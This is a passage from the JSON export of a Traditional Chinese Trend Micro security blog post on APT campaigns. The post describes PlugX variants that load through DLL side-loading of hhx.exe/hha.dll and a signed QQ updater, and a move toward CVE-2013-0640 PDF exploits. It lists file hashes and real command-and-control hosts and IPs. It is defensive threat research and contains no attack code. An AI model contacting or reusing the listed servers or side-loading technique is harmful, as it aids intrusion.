valign=\"bottom\"><b>A9RE078.tmp (PDF)<\/b><\/td>\n<td valign=\"bottom\"><b>SharedDataEvents-journal<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">4f4ceedd8da84be88dbea7b49f1b82e5<\/td>\n<td valign=\"bottom\">e719894252665a7cbf8efc18babdd70e<\/td>\n<td valign=\"bottom\">4754e6d5ea3b6ca2357146a1e56c3c47<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\"><b>SharedDataEvents-journal<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">b16f24e72c42059cd44a9fb48ea8bf98<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\"><b>A9RD53D.tmp (PDF)<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">200569e47e6e5a3f629533423d4ba03b<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\"><b>SharedDataEvents-journal<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">b930ef3a77e6c4669312f582fc405f61<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\"><b>SharedDataEvents-journal<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">38149cfb66075a9009d460e86c138141<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\"><b>SharedDataEvents-journal<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">566ea4be505009d422d5fd6c395a33b9<\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\"><b>A9RD53C.tmp (PDF)<\/b><\/td>\n<\/tr>\n<tr>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">&nbsp;<\/td>\n<td valign=\"bottom\">ca79b7a45410dd1e995a4997dcc6d126<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><i><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\">PlugX<\/a>:HHX<\/i><\/p>\n<p><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\">PlugX<\/a>\u7684\u7b2c\u4e00\u7d44\u8b8a\u7a2e\u6703\u5229\u7528Microsoft HTML\u8f14\u52a9\u8aaa\u660e\u7de8\u8b6f\u5668\uff0c\u5c31\u5982\u540c\u9019\u7bc7<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/new-wave-of-plugx-targets-legitimate-apps\/\">\u6587\u7ae0<\/a>\u5167\u6240\u63cf\u8ff0\u7684\u4e00\u6a23\u3002\u6211\u5011\u5df2\u7d93\u770b\u5230\u9019\u8b8a\u7a2e\u88ab\u7528\u5728\u76ee\u6a19\u653b\u64ca\u5167\u3002\u5728\u9019\u6848\u4f8b\u4e2d\uff0c\u653b\u64ca\u8005\u5c0d\u76ee\u6a19\u767c\u9001\u4e86\u4e00\u5c01\u96fb\u5b50\u90f5\u4ef6\uff0c\u4ee5\u8a98\u4f7f\u4ed6\u5011\u6253\u958b\u60e1\u610f\u9644\u52a0\u6a94\u6848\u3002<\/p>\n<p>\u6211\u5011\u6240\u5206\u6790\u7684\u6a23\u672c\u6703\u5c07\u6a94\u6848\u690d\u5165\u8cc7\u6599\u593e \u2013 <i>hhx<\/i>\u5167\uff0c\u4e26\u4e14\u5229\u7528\u6b63\u5e38\u7684Microsoft\u6a94\u6848 \u2013 <i>hhx.exe<\/i>\u53bb\u8f09\u5165<i>hha.dll<\/i>\uff0c\u63a5\u8457\u518d\u8f09\u5165<i>hha.dll.bak<\/i>\u3002\u6211\u5011\u6240\u5206\u6790\u6a94\u6848\u6240\u4f7f\u7528\u7684\u547d\u4ee4\u548c\u63a7\u5236\u4f3a\u670d\u5668\u662f14.102.252.142\u3002<\/p>\n<p><a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\"><i>PlugX<\/i><\/a><i>\uff1aPDH<\/i><\/p>\n<p>\u6211\u5011\u6240\u5206\u6790\u7684\u7b2c\u4e8c\u7d44<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=10800\">PlugX<\/a>\u8b8a\u7a2e\uff0c\u6703\u5c07\u6a94\u6848\u690d\u5165\u5230\u8cc7\u6599\u593e \u2013 PDH\u5167\uff0c\u4e26\u4e14\u5229\u7528\u5df2\u7d93\u7c3d\u8b49\u904e\u7684<i>QQ\u700f\u89bd\u5668\u66f4\u65b0\u670d\u52d9<\/i>\u6a94\u6848\u4f86\u8f09\u5165PDH.dll\uff0c\u63a5\u8457\u6703\u8f09\u5165PDH.pak\u3002<\/p>\n<figure class=\"thumbnail wp-caption alignnone\" style=\"width: 424px\"><img loading=\"lazy\" decoding=\"async\" src=\" https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2013\/04\/nart-pdf-4.jpg\" alt=\"\" width=\"414\" height=\"396\"><figcaption class=\"caption wp-caption-text\">\u5716\u4e09\u3001\u7c3d\u8b49\u904e\u7684\u6a94\u6848<\/figcaption><\/figure>\n<p>\u9019\u4e9b\u6a94\u6848\u5229\u7528<i>dnsport.chatnook.com<\/i>\u3001<i>inter.so-webmail.com<\/i>\u548c223.25.242.45\u505a\u70ba\u547d\u4ee4\u548c\u63a7\u5236\u4f3a\u670d\u5668\u3002<\/p>\n<p><i>\u7d50\u8ad6<\/i><\/p>\n<p><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u7684\u7814\u7a76\u986f\u793a\u9019\u4e9b<a href=\"https:\/\/blog.trendmicro.com.tw\/?p=123\">APT-\u9032\u968e\u6301\u7e8c\u6027\u6ef2\u900f\u653b\u64ca (Advanced Persistent Threat, APT)<\/a>\u6d3b\u52d5\u7684\u653b\u64ca\u8005\u958b\u59cb\u5229\u7528MiniDuke\u653b\u64ca\u6d3b\u52d5\u6240\u88fd\u9020\u7684\u6f0f\u6d1e\u653b\u64ca\u78bc\uff0c\u4e26\u5c07\u5176\u52a0\u5165\u5230\u4ed6\u5011\u7684\u8ecd\u706b\u5eab\u4e2d\u3002\u5728\u9019\u540c\u6642\uff0c\u6211\u5011\u4e5f\u767c\u73fe\u4f3c\u4e4e\u6709\u5176\u4ed6APT\u653b\u64ca\u6d3b\u52d5\u5df2\u7d93\u958b\u767c\u51fa\u81ea\u5df1\u7684\u65b9\u5f0f\u4f86\u5229\u7528\u76f8\u540c\u7684\u6f0f\u6d1e\u3002\u653b\u64ca\u6f0f\u6d1e \u2013 CVE-2013-0640\u7684\u60e1\u610fPDF\u6578\u91cf\u589e\u52a0\uff0c\u4e5f\u4ee3\u8868\u4e86APT\u653b\u64ca\u8005\u5f9e\u4f7f\u7528\u60e1\u610fWord\u6a94\u6848\u653b\u64ca\u76f8\u5c0d\u8001\u820a\u7684\u6f0f\u6d1e \u2013 CVE-2012-0158\u958b\u59cb\u8f49\u79fb\u9663\u5730\u4e86\u3002<\/p>\n<p>\uff20\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/malicious-pdfs-on-the-rise\/\">Malicious PDFs On The Rise<\/a>\u4f5c\u8005\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/author\/nartv\/\">Nart Villeneuve\uff08\u8cc7\u6df1\u5a01\u8105\u7814\u7a76\u54e1\uff09<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>\u60f3\u4e86\u89e3\u66f4\u591a\u95dc\u65bc\u7db2\u8def\u5b89\u5168\u7684\u79d8\u8a23\u548c\u5efa\u8b70\uff0c\u53ea\u8981\u5230<a href=\"https:\/\/www.facebook.com\/trendmicrotaiwan\">\u8da8\u52e2\u79d1\u6280\u7c89\u7d72\u7db2\u9801<\/a> \u6216\u4e0b\u9762\u7684\u6309\u9215\u6309\u8b9a<br \/>\n<iframe loading=\"lazy\" style=\"width: 350px; height: 62px; overflow: hidden;\" src=\"https:\/\/www.facebook.com\/plugins\/likebox.php?id=255176705131&amp;width=350&amp;connections=0&amp;stream=false&amp;header=false&amp;height=62\" width=\"320\" height=\"240\" frameborder=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<p>\u25ce\u5ef6\u4f38\u95b1\u8b80<\/p>\n<p><a title=\"\u4e94\u500b\u7d66\u5c0f\u578b\u4f01\u696d\u95dc\u65bc\u96f2\u7aef\u904b\u7b97\u7684\u8ff7\u601d\u8207\u4e8b\u5be6 \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=3540\" rel=\"bookmark\">\u4e94\u500b\u7d66\u5c0f\u578b\u4f01\u696d\u95dc\u65bc\u96f2\u7aef\u904b\u7b97\u7684\u8ff7\u601d\u8207\u4e8b\u5be6<\/a><\/p>\n<p><a title=\"\u300a\u8da8\u52e2\u5c08\u5bb6\u8ac7\u96f2\u7aef\u904b\u7b97\u300bVMworld\u7684\u71b1\u9580\u8a71\u984c\uff1a\u70ba\u4ec0\u9ebc\u5b89\u5168\u5718\u968a\u559c\u6b61\u865b\u64ec\u5316\u684c\u9762\u67b6\u69cb \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=3194\" rel=\"bookmark\">\u300a\u8da8\u52e2\u5c08\u5bb6\u8ac7\u96f2\u7aef\u904b\u7b97\u300bVMworld\u7684\u71b1\u9580\u8a71\u984c\uff1a\u70ba\u4ec0\u9ebc\u5b89\u5168\u5718\u968a\u559c\u6b61\u865b\u64ec\u5316\u684c\u9762\u67b6\u69cb<\/a><\/p>\n<p><a title=\"\u516b\u500b\u4ee4\u4eba\u7121\u6cd5\u82df\u540c\u7684\u96f2\u7aef\u8ff7\u601d \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=3546\" rel=\"bookmark\">\u516b\u500b\u4ee4\u4eba\u7121\u6cd5\u82df\u540c\u7684\u96f2\u7aef\u8ff7\u601d<\/a><\/p>\n<p><a title=\"\u5c0f\u578b\u4f01\u696d\u662f\u7db2\u8def\u72af\u7f6a\u8005\u7684\u5927\u4e8b\u696d-\u6bcf\u500b\u5c0f\u578b\u4f01\u696d\u90fd\u61c9\u77e5\u9053\u7684\u4e94\u4ef6\u95dc\u65bc\u7db2\u8def\u72af\u7f6a\u7684\u4e8b \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=3514\" rel=\"bookmark\">\u5c0f\u578b\u4f01\u696d\u662f\u7db2\u8def\u72af\u7f6a\u8005\u7684\u5927\u4e8b\u696d-\u6bcf\u500b\u5c0f\u578b\u4f01\u696d\u90fd\u61c9\u77e5\u9053\u7684\u4e94\u4ef6\u95dc\u65bc\u7db2\u8def\u72af\u7f6a\u7684\u4e8b<\/a><\/p>\n<p><a title=\"\u5c0f\u578b\u4f01\u696d\u7684\u96f2\u7aef\u4e4b\u8def\uff0c\u5230\u982d\u4f86\u9084\u662f\u56de\u5230\u539f\u9ede \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=3510\" rel=\"bookmark\">\u5c0f\u578b\u4f01\u696d\u7684\u96f2\u7aef\u4e4b\u8def\uff0c\u5230\u982d\u4f86\u9084\u662f\u56de\u5230\u539f\u9ede<\/a><\/p>\n<p><a title=\"\u8d85\u795e\u6e96\u7684\u7b97\u547d\u5927\u5e2b\u5982\u4f55\u7528\u96f2\u7aef\u5c55\u958b\u8b80\u5fc3\u8853?!(\u5f71\u7247) \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=3361\" rel=\"bookmark\">\u8d85\u795e\u6e96\u7684\u7b97\u547d\u5927\u5e2b\u5982\u4f55\u7528\u96f2\u7aef\u5c55\u958b\u8b80\u5fc3\u8853?!(\u5f71\u7247)<\/a><\/p>\n<p><a title=\"\u4fdd\u8b77\u60a8\u9081\u5411\u96f2\u7aef\u4e4b\u8def\u7684 10 \u500b\u6b65\u9a5f \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2897\" rel=\"bookmark\">\u4fdd\u8b77\u60a8\u9081\u5411\u96f2\u7aef\u4e4b\u8def\u7684 10 \u500b\u6b65\u9a5f<\/a><\/p>\n<p><a title=\"\u5de8\u91cf\u8cc7\u6599\u5206\u6790\u548c\u4e3b\u52d5\u5f0f\u96f2\u7aef\u622a\u6bd2\u6280\u8853 \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2396\" rel=\"bookmark\">\u5de8\u91cf\u8cc7\u6599\u5206\u6790\u548c\u4e3b\u52d5\u5f0f\u96f2\u7aef\u622a\u6bd2\u6280\u8853<\/a><\/p>\n<p><a title=\"\u95dc\u65bc\u96f2\u7aef\u4e4b\u65c5\u7684\u516d\u500b\u597d\u8655\u548c\u98a8\u96aa(2012\u5e74\u8da8\u52e2\u79d1\u6280\u96f2\u7aef\u5b89\u5168\u8abf\u67e5) \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2614\" rel=\"bookmark\">\u95dc\u65bc\u96f2\u7aef\u4e4b\u65c5\u7684\u516d\u500b\u597d\u8655\u548c\u98a8\u96aa(2012\u5e74\u8da8\u52e2\u79d1\u6280\u96f2\u7aef\u5b89\u5168\u8abf\u67e5)<\/a><\/p>\n<p><a title=\"\u865b\u64ec\u5316\u7684\u7121\u4ee3\u7406\u9632\u8b77\u4e5f\u9069\u7528\u65bc\u96f2\u7aef\u55ce\uff1f \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2547\">\u865b\u64ec\u5316\u7684\u7121\u4ee3\u7406\u9632\u8b77\u4e5f\u9069\u7528\u65bc\u96f2\u7aef\u55ce\uff1f<\/a><\/p>\n<p><a title=\"\u6703\u653b\u64caVMware\u865b\u64ec\u6a5f\u5668\u7684\u65b0\u75c5\u6bd2:Crisis\uff08\u53c8\u7a31\u70baMorcut\uff09 \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2385\">\u6703\u653b\u64caVMware\u865b\u64ec\u6a5f\u5668\u7684\u65b0\u75c5\u6bd2:Crisis\uff08\u53c8\u7a31\u70baMorcut\uff09<\/a><\/p>\n<p><a title=\"Cirsis\/MORCUT \u60e1\u610f\u8edf\u9ad4\u639b\u8f09\u865b\u64ec\u6a5f\u5668 \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2525\">Cirsis\/MORCUT \u60e1\u610f\u8edf\u9ad4\u639b\u8f09\u865b\u64ec\u6a5f\u5668<\/a><\/p>\n<p><a title=\"\u300a\u8da8\u52e2\u5c08\u5bb6\u8ac7\u96f2\u7aef\u904b\u7b97\u300b\u8edf\u9ad4\u5b9a\u7fa9\u7db2\u8def\u91cd\u65b0\u6d17\u724c\uff1aVMware\u6536\u8cfcNicira\uff0cOracle\u6536\u8cfcXsigo \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2289\">\u300a\u8da8\u52e2\u5c08\u5bb6\u8ac7\u96f2\u7aef\u904b\u7b97\u300b\u8edf\u9ad4\u5b9a\u7fa9\u7db2\u8def\u91cd\u65b0\u6d17\u724c\uff1aVMware\u6536\u8cfcNicira\uff0cOracle\u6536\u8cfcXsigo<\/a><\/p>\n<p><a title=\"\u300a\u8da8\u52e2\u5c08\u5bb6\u8ac7\u96f2\u7aef\u904b\u7b97\u300b\u58ae\u5165\u865b\u64ec\u5316\u76f8\u95dc\u5a01\u8105\u7684\u6df1\u6df5 \u6c38\u4e45\u93c8\u7d50\" href=\"https:\/\/blog.trendmicro.com.tw\/?p=2078\">\u300a\u8da8\u52e2\u5c08\u5bb6\u8ac7\u96f2\u7aef\u904b\u7b97\u300b\u58ae\u5165\u865b\u64ec\u5316\u76f8\u95dc\u5a01\u8105\u7684\u6df1\u6df5<\/a><\/p>\n<p><strong>\u25ce \u6b61\u8fce\u52a0\u5165\u8da8\u52e2\u79d1\u6280\u793e\u7fa4\u7db2\u7ad9<br \/>\n<\/strong><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2762&amp;name=20111213\"><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com.tw\/campaign\/tw_blog_images\/blogad\/FBICON.PNG\" alt=\"\"><\/a>&nbsp;<a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2763&amp;name=20111213\"><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com.tw\/campaign\/tw_blog_images\/blogad\/plurk.PNG\" alt=\"\"><\/a>&nbsp;<a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2764&amp;name=20111213\"><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com.tw\/campaign\/tw_blog_images\/blogad\/YOUTUBE.PNG\" alt=\"\"><\/a><a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2766&amp;name=20111213\"><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com.tw\/campaign\/tw_blog_images\/blogad\/G+.PNG\" alt=\"\"><\/a>&nbsp;<a href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2765&amp;name=20111213\"><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com.tw\/campaign\/tw_blog_images\/blogad\/RSS.PNG\" alt=\"\"><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u57282012\u5e74\u88e1\uff0c\u6211\u5011\u770b\u5230\u4e86\u5404\u5f0f\u5404\u6a23\u7684APT\u653b\u64ca\u6d3b\u52d5\u5229\u7528Microsoft Word\u7684\u6f0f\u6d1e \u2013 CVE-2012 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[10,46],"tags":[44,2280,498,1074],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/5030"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5030"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/5030\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}